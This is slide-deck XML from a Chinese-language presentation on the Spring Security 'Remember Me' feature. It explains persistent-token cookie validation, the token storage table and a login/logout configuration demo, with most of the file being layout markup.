                <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="45C1A4"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>基于持久化</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="45C1A4"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="45C1A4"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>Persistent-based)</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="45C1A4"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/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xmlns="" id="{B56AA7D8-76EF-4DB2-9171-0DCF3C3F9940}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7478782" y="2551978"/>
              <a:ext cx="4985657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该方式将不会校验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</a:rPr>
                <a:t>cookie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中的签名，而是校验存储在数据库中的令牌。每个持久化的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</a:rPr>
                <a:t>cookie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中将包含如下部分：</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>1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、</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0" smtClean="0"/>
                <a:t> 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Series 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</a:rPr>
                <a:t>identifier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：识别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用户的初始登录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。每次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用户自动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登录都是一致从原始会话。</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>2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、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Token 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</a:rPr>
                <a:t>value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：每次使用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</a:rPr>
                <a:t>Remember Me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特性用户认证成功都生成的一个唯一的值。</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs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7573689"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow" advClick="0" advTm="100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53143" y="551543"/>
            <a:ext cx="4513942" cy="740228"/>
            <a:chOff x="6284686" y="1016000"/>
            <a:chExt cx="4513942" cy="740228"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="文本框 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7373257" y="1124504"/>
              <a:ext cx="34253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Remember Me</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="280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特性</a:t>
              </a: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284686" y="1016000"/>
              <a:ext cx="740228" cy="740228"/>
              <a:chOff x="6284686" y="1016000"/>
              <a:chExt cx="740228" cy="740228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6284686" y="1016000"/>
                <a:ext cx="740228" cy="740228"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="45C1A4">
                  <a:alpha val="54902"/>
                </a:srgbClr>
              </a:solidFill>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst>
                <a:glow rad="215900">
                  <a:srgbClr val="7A9A92">
                    <a:alpha val="5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6444343" y="1132114"/>
                <a:ext cx="4354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3</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" altLang="en-US" sz="28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xmlns="" id="{AC7928B7-4C8F-4F94-9AE1-D1C443BA3495}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="653143" y="1407885"/>
            <a:ext cx="6900562" cy="4447372"/>
            <a:chOff x="7478782" y="1890258"/>
            <a:chExt cx="4985657" cy="4447372"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="Text Box 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{9B03D3CB-3C4A-4546-AC9A-A77ED65D0C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54985" y="1890258"/>
              <a:ext cx="4540536" cy="661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45720" tIns="22860" rIns="45720" bIns="22860">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="1088232">
                <a:lnSpc>
                  <a:spcPct val="200000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="45C1A4"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>基于持久化</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="45C1A4"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="45C1A4"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>Persistent-based</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="45C1A4"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>) </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="45C1A4"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>安全性更高</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="45C1A4"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt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xmlns="" id="{B56AA7D8-76EF-4DB2-9171-0DCF3C3F9940}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7478782" y="2551978"/>
              <a:ext cx="4985657" cy="37856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dirty="0" err="1" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                </a:rPr>
                <a:t>PersistentTokenBasedRememberMeServices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</a:rPr>
                <a:t> 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中的校验处理逻辑：</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
            <a:p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而基于令牌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</a:rPr>
                <a:t>(Token-based)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的方式仅仅是完成了简单的校验，签名将一直存在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</a:rPr>
                <a:t>cookie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中直到失效。这样被盗取的可能性大大提高。</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea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14" y="2408159"/>
            <a:ext cx="5888929" cy="2802470"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="21" name="直接箭头连接符 20"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3703078" y="4171951"/>
            <a:ext cx="1030847" cy="57422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4715300" y="3535713"/>
            <a:ext cx="1932243" cy="938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100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Token </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>校验失败将删除用户的令牌信息。这种情况有可能是此时用户的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>可能被窃取，攻击者可能使用旧的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>伪造用户身份。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092" y="3809394"/>
            <a:ext cx="4243374" cy="1225181"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="25" name="直接箭头连接符 24"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7697087" y="3262032"/>
            <a:ext cx="527523" cy="54736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8224610" y="3014387"/>
            <a:ext cx="1823561" cy="60016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100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Token </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>校验成功将重新生成令牌，形成新的签名写入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>，覆盖原有的值。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380307"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow" advClick="0" advTm="100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53143" y="551543"/>
            <a:ext cx="4513942" cy="740228"/>
            <a:chOff x="6284686" y="1016000"/>
            <a:chExt cx="4513942" cy="740228"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="文本框 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7373257" y="1124504"/>
              <a:ext cx="34253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Remember Me</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="280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特性</a:t>
              </a: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284686" y="1016000"/>
              <a:ext cx="740228" cy="740228"/>
              <a:chOff x="6284686" y="1016000"/>
              <a:chExt cx="740228" cy="740228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6284686" y="1016000"/>
                <a:ext cx="740228" cy="740228"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="45C1A4">
                  <a:alpha val="54902"/>
                </a:srgbClr>
              </a:solidFill>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst>
                <a:glow rad="215900">
                  <a:srgbClr val="7A9A92">
                    <a:alpha val="5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6444343" y="1132114"/>
                <a:ext cx="4354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3</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" altLang="en-US" sz="28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74" y="1596866"/>
            <a:ext cx="6183084" cy="249791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773" y="4525093"/>
            <a:ext cx="6183086" cy="1124916"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="20" name="直接箭头连接符 19"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4430924" y="2377731"/>
            <a:ext cx="325693" cy="887885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301776" y="1610710"/>
            <a:ext cx="1823561" cy="76944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配置客户化的登录表单及退出功能、并启用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Remember Me</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>特性。同时设置</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>保护。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 flipV="1">
            <a:off x="1130044" y="4344794"/>
            <a:ext cx="653143" cy="41359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783301" y="4100854"/>
            <a:ext cx="1083838" cy="43088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启用持久化</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Toke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>存储方式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763" y="1949184"/>
            <a:ext cx="4818742" cy="2145601"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="28" name="直接箭头连接符 27"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="8202644" y="1600303"/>
            <a:ext cx="752356" cy="33271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9028765" y="1466061"/>
            <a:ext cx="1823561" cy="26161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100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Token</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>存储表结构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772" y="6080317"/>
            <a:ext cx="6183086" cy="576639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5020" y="5087551"/>
            <a:ext cx="5214971" cy="1413650"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="32" name="直接箭头连接符 31"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="31" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4666342" y="5794376"/>
            <a:ext cx="2148678" cy="567650"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="50800">
            <a:solidFill>
              <a:srgbClr val="FFFF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7534987" y="4673952"/>
            <a:ext cx="653143" cy="41359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8202644" y="4316298"/>
            <a:ext cx="1823561" cy="60016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自定义登出处理，用户登出成功后跳转到登录页面，并标识该用户已登出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36" name="直接箭头连接符 35"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3890653" y="3657600"/>
            <a:ext cx="540271" cy="2514600"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="50800">
            <a:solidFill>
              <a:srgbClr val="FFFF00">
                <a:alpha val="60000"/>
              </a:srgb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flipH="1">
            <a:off x="3260534" y="3847426"/>
            <a:ext cx="44145" cy="910967"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="50800">
            <a:solidFill>
              <a:srgbClr val="FFFF00">
                <a:alpha val="60000"/>
              </a:srgb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flipH="1">
            <a:off x="1784949" y="3854036"/>
            <a:ext cx="540271" cy="2514600"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="50800">
            <a:solidFill>
              <a:srgbClr val="FFFF00">
                <a:alpha val="60000"/>
              </a:srgb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535880"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow" advClick="0" advTm="1000">
    <p:wheel spokes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53143" y="551543"/>
            <a:ext cx="4513942" cy="740228"/>
            <a:chOff x="6284686" y="1016000"/>
            <a:chExt cx="4513942" cy="740228"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="文本框 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7373257" y="1124504"/>
              <a:ext cx="34253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Remember Me</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="280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特性</a:t>
              </a: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284686" y="1016000"/>
              <a:ext cx="740228" cy="740228"/>
              <a:chOff x="6284686" y="1016000"/>
              <a:chExt cx="740228" cy="740228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6284686" y="1016000"/>
                <a:ext cx="740228" cy="740228"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="45C1A4">
                  <a:alpha val="54902"/>
                </a:srgbClr>
              </a:solidFill>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst>
                <a:glow rad="215900">
                  <a:srgbClr val="7A9A92">
                    <a:alpha val="5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6444343" y="1132114"/>
                <a:ext cx="4354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3</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" altLang="en-US" sz="28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1" y="1705266"/>
            <a:ext cx="6821714" cy="3316677"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="17" name="直接箭头连接符 16"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4986536" y="1944914"/>
            <a:ext cx="2517350" cy="464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503886" y="1814109"/>
            <a:ext cx="1823561" cy="26161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自定义登录表单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 flipV="1">
            <a:off x="3589976" y="3686629"/>
            <a:ext cx="865910" cy="28767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4421650" y="3525311"/>
            <a:ext cx="1398579" cy="26291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登录后的欢迎页面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 flipV="1">
            <a:off x="3238900" y="4355946"/>
            <a:ext cx="865910" cy="28767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4104810" y="4233383"/>
            <a:ext cx="1398579" cy="26291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登录认证失败页面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237892"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow" advClick="0" advTm="1000">
    <p:wheel spokes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53143" y="551543"/>
            <a:ext cx="4513942" cy="740228"/>
            <a:chOff x="6284686" y="1016000"/>
            <a:chExt cx="4513942" cy="740228"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="文本框 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7373257" y="1124504"/>
              <a:ext cx="34253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Remember Me</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="280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特性</a:t>
              </a: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284686" y="1016000"/>
              <a:ext cx="740228" cy="740228"/>
              <a:chOff x="6284686" y="1016000"/>
              <a:chExt cx="740228" cy="740228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6284686" y="1016000"/>
                <a:ext cx="740228" cy="740228"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="45C1A4">
                  <a:alpha val="54902"/>
                </a:srgbClr>
              </a:solidFill>
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst>
                <a:glow rad="215900">
                  <a:srgbClr val="7A9A92">
                    <a:alpha val="5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6444343" y="1132114"/>
                <a:ext cx="4354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3</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" altLang="en-US" sz="28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86" y="2159513"/>
            <a:ext cx="5210744" cy="28479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200" y="2159513"/>
            <a:ext cx="5684115" cy="161980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9886" y="3889829"/>
            <a:ext cx="5675086" cy="2812467"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="18" name="直接箭头连接符 17"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1942548" y="1666028"/>
            <a:ext cx="510366" cy="493485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2452915" y="1425560"/>
            <a:ext cx="1524000" cy="60016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登录页面，输入账号和密码并选中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>【</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>请记住我</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>】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V="1">
            <a:off x="6656257" y="1666027"/>
            <a:ext cx="510366" cy="493485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166623" y="1458814"/>
            <a:ext cx="1524000" cy="43088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登录认证成功后的欢迎页面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 flipH="1" flipV="1">
            <a:off x="5631543" y="5500913"/>
            <a:ext cx="3205886" cy="374257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4095771" y="5327323"/>
            <a:ext cx="1524000" cy="938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登录成功后生成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>remember me cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>，关闭浏览器后重启浏览器输入网址将自动登录。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792571"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow" advClick="0" advTm="1000">
    <p:wheel spokes="1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53143" y="551543"/>
            <a:ext cx="4513942" cy="740228"/>
            <a:chOff x="6284686" y="1016000"/>
            <a:chExt cx="4513942" cy="740228"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="文本框 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7373257" y="1124504"/>
              <a:ext cx="34253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Remember Me</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="280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特性</a:t>
              </a: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284686" y="1016000"/>
